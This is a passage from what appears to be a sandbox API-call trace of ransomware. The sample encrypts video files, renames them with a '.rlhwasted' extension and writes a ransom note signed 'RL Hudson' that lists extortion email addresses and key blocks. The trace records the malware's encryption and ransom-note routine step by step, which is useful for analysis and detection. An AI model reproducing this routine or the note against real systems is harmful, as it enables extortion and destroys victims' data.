HALPmcxz\\Videos\\QGaodbhsY\\gSYHJ3Pc9fOO1jBH5h1.mkv") returned 74 [0197.073] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29e) returned 0x6d4580 [0197.073] lstrcpyW (in: lpString1=0x6d4614, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.073] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.074] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0197.074] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.074] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\gSYHJ3Pc9fOO1jBH5h1.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\gsyhj3pc9foo1jbh5h1.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.075] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.076] SetEndOfFile (hFile=0x108) returned 1 [0197.076] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.076] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.076] lstrcpyW (in: lpString1=0x6d4614, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\gSYHJ3Pc9fOO1jBH5h1.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\gsyhj3pc9foo1jbh5h1.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\gSYHJ3Pc9fOO1jBH5h1.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\gsyhj3pc9foo1jbh5h1.mkv.rlhwasted")) returned 1 [0197.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\gSYHJ3Pc9fOO1jBH5h1.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\gsyhj3pc9foo1jbh5h1.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.077] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0197.077] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x5cef [0197.077] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5cef) returned 0x6a0000 [0197.077] CloseHandle (hObject=0x128) returned 1 [0197.081] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.081] CloseHandle (hObject=0x124) returned 1 [0197.081] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x707f58 [0197.081] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0197.082] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x707fa0 | out: pbBuffer=0x707fa0) returned 1 [0197.082] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.082] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0197.083] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.083] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0197.091] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.091] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ELjWJAKi7vV0jwGGcsdl357qw8++DsIu3UIJLSOgK6JYVYrpJoROjJZkstTokrEy\r\ntbmlLKXRLTGrM8kVXq3m/V1hfyEMbowXqfDnzkKdVozH5k77PsLLxHYwKxAUbVZR\r\n7+X0TT5FJjiXsd2qYY4CeOl7o2U3nhrHrHBW3dPrSSxDxXjkePGHhjdXVcTFiv7j\r\n625hHMGzUp4ctHULFpDWXbSsxOdLnY573Dvx6Sb0OB5nMWSr9zXbHpURlqTq0lS/\r\n+rRD9j9iPjxQxSTImTcQI+l6KmT1g8i6LM3ad+L+fB1gAwlIuwXWpo3qCrG086jP\r\n65OzBxQIscJKjrzZidM8UENijPp0U8QqRMKkCBp6VM4nblxv8+mlsn7N94F+2EW0\r\nWTQ41z2rYvTWbCbyRGu76uuio4J4WVoXYW6zIGt1W57wMbo1VYSrPylohaQyFxCz\r\nl9QD+7OGpK7+zMz27qa1hRxTlHf36zBNd3G3lBUxjGgbBIsUv44YnT0MONfE6YF7\r\n4INr6Ie5r82DXgWcDvVQesaDV58mMTVpn1BvjAoOjHTMN8lgDLoK7t7J5/RY/CCA\r\nr+icIPoDnACT5CtYlD/C0+oeHOSZA9JLHeuvATdMd/eA2xlGfPfunuCJPcK4vO3j\r\n1d3Ka4qKkbZnCgPKuKsS6hmFhSYz9J9qSiHGMZkshwE=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.091] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.091] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.091] SetEndOfFile (hFile=0x108) returned 1 [0197.094] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.094] CloseHandle (hObject=0x108) returned 1 [0197.095] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0197.096] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6b0000) returned 1 [0197.096] _aulldvrm () returned 0x0 [0197.096] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0197.097] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.097] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.097] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\Nfe3Z32DLj_WEtvSz0.flv") returned 73 [0197.097] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29c) returned 0x6d4580 [0197.097] lstrcpyW (in: lpString1=0x6d4612, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.097] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.097] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0197.097] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.098] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\Nfe3Z32DLj_WEtvSz0.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\nfe3z32dlj_wetvsz0.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.098] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.099] SetEndOfFile (hFile=0x108) returned 1 [0197.099] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.099] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.100] lstrcpyW (in: lpString1=0x6d4612, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.100] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\Nfe3Z32DLj_WEtvSz0.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\nfe3z32dlj_wetvsz0.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\Nfe3Z32DLj_WEtvSz0.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\nfe3z32dlj_wetvsz0.flv.rlhwasted")) returned 1 [0197.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\Nfe3Z32DLj_WEtvSz0.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\nfe3z32dlj_wetvsz0.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.148] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0197.148] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xf423 [0197.148] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf423) returned 0x6a0000 [0197.148] CloseHandle (hObject=0x128) returned 1 [0197.153] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.153] CloseHandle (hObject=0x124) returned 1 [0197.153] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.153] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f98) returned 1 [0197.154] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.154] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0197.154] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f98) returned 1 [0197.155] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.155] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0197.165] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0197.165] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.165] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.165] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OVO19vyZ8fvCuKUN/JG1A+cp12FR4UJWLDsoeG/i0ib0Rj2P5EYMBBg114gctk0n\r\nEN87V+QfG0kJJM40TLyvi9lYcXYnAL/MsflQ8qKDstDWKwPBU0NnVWPAB1h4L810\r\nkKxki3KKA2QOmO0esCYqlQxiQd6aW+8SsVrLJ+4YFXGiZEx7tunjPxKEcZB1Cgk6\r\n8e4o8wHVZMYj3fQXs7TMPrzOvkPtYWC2JajxcLWIEDLua3ZJnpGKwK8hQV7LNx6k\r\nmv5CK3D9eCffp9Kr4fkKMfdWCYBqUjW+kXA9ajbsZNIg/JIZpAMR8sB8CEoRgb7M\r\n6qs8fwKJJyV7dltK9jbhpS2aAFZDwOEZ0ieJ/t971AMx4Ohcc7aX4HGLSwLUprwo\r\nI3PFh1+oO2+uduANVyAR1227R+Tbm/shaQ2m0BFrVhouy11z1QR3pa1hL3z9rllO\r\nEk1S5XYvtmzIysA9HI5zSLEdHh2Tkloubd6FmvDhneC/ybppU10v3rbaYuLXfYFP\r\n41B/J838/MfYGDlVNpWW56goy3Q35fs0vaDy2gbcTWsLLmMrNRSEX8dMMRbI9zYd\r\niwE2I8qWFzvGf4lCUXD1OngokTDJSrnz8YPxL9YbiDEL0PFbwfkmB8r508C+VLB5\r\ndmMroQtjp6hKZe/VR8vgZcU9yqh8GlgEKhmgsZZOU9d=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.165] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.166] WriteFile (in: hFile=0x108, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.166] SetEndOfFile (hFile=0x108) returned 1 [0197.168] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.168] CloseHandle (hObject=0x108) returned 1 [0197.170] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0197.171] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7e28 | out: hHeap=0x6b0000) returned 1 [0197.171] _aulldvrm () returned 0x0 [0197.171] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f98) returned 1 [0197.172] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.172] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0197.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xec7V0uLSTsJKi.mkv") returned 59 [0197.172] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x280) returned 0x6d4580 [0197.172] lstrcpyW (in: lpString1=0x6d45f6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.172] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.172] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f98) returned 1 [0197.173] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0197.173] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0197.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xec7V0uLSTsJKi.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xec7v0ulstsjki.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.174] WriteFile (in: hFile=0x108, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.176] SetEndOfFile (hFile=0x108) returned 1 [0197.176] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.176] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.176] lstrcpyW (in: lpString1=0x6d45f6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.176] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xec7V0uLSTsJKi.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xec7v0ulstsjki.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xec7V0uLSTsJKi.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xec7v0ulstsjki.mkv.rlhwasted")) returned 1 [0197.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xec7V0uLSTsJKi.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xec7v0ulstsjki.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0197.197] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0197.198] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x12dbf [0197.198] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12dbf) returned 0xb00000 [0197.198] CloseHandle (hObject=0x124) returned 1 [0197.204] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0197.205] CloseHandle (hObject=0x104) returned 1 [0197.205] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.205] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0197.206] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.206] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.206] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0197.207] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.207] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0197.221] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.221] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]g9nK09U5RP9cLD2Ac1Z9bbjg0gHDGaTiZ+SLhgtuBUOGz3UQ1+reA3zMzFgeRUNS\r\nNW3payjnRhdMjwwqF8D7zzIAaFmHIQqOnK6XgYzq0gL4SzuGK8LcusCXJr24MciG\r\nEx67Xci2Sa9lz6svluPmHcHh/g/Djmq9HTosuoKf7IsQnu0gYBuoBpKLxnXTnKN9\r\nWO1JpiwHy8jSfnzRnEuqCGbEidUm1IRyyaAO1ce+ywQdM+/hzYOcV/3qlKzQ5UrE\r\nnsft6ses9rz1NUZ7Badlw3LFHv1thO5XKzCCMZABUqJhfY9esnD8bo53XJ0Zskca\r\n29UiUuQwn2VBwB3atCPviKO4DhMcGFPbVIjTsDrXxZ/RLXL60d/eHXagQaNvyKpG\r\n7o+dE4eBciHJodoBVYcRQNcCFpRw/M9Kr66NSES0qZf8fO/SZ0h/bvWYGKh2v+jS\r\n86Icd71Q0LB5zL9hIMms8O/8CZI4bWtkDPjhE4ntfQMVvkJiOzfIkJB6tinVRPef\r\nInz0PR8lXO9hAL79HhAuKFCejCZs/DTWmXk+CfZRYlOJoGwtGcUN5u1dfmLHibfn\r\nGPrMzmCdfWcDqBCvTKapzDgarjBOR/EPPyr0yP2NEICMVIRMMhHgPc6l8arCwYho\r\nA8AdkyEGNvc+dyQ8H2sEgqMRzwKn/ZOOClq7qFdTJhd=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.221] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.221] WriteFile (in: hFile=0x108, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.221] SetEndOfFile (hFile=0x108) returned 1 [0197.224] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.224] CloseHandle (hObject=0x108) returned 1 [0197.226] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0197.227] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706380 | out: hHeap=0x6b0000) returned 1 [0197.227] _aulldvrm () returned 0x0 [0197.227] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0197.228] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.228] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.228] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\DuzaOT6Ag2.flv") returned 92 [0197.228] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c2) returned 0x6e8978 [0197.228] lstrcpyW (in: lpString1=0x6e8a30, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.228] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0197.228] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0197.229] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0197.229] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\DuzaOT6Ag2.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\duzaot6ag2.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.230] WriteFile (in: hFile=0x108, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.232] SetEndOfFile (hFile=0x108) 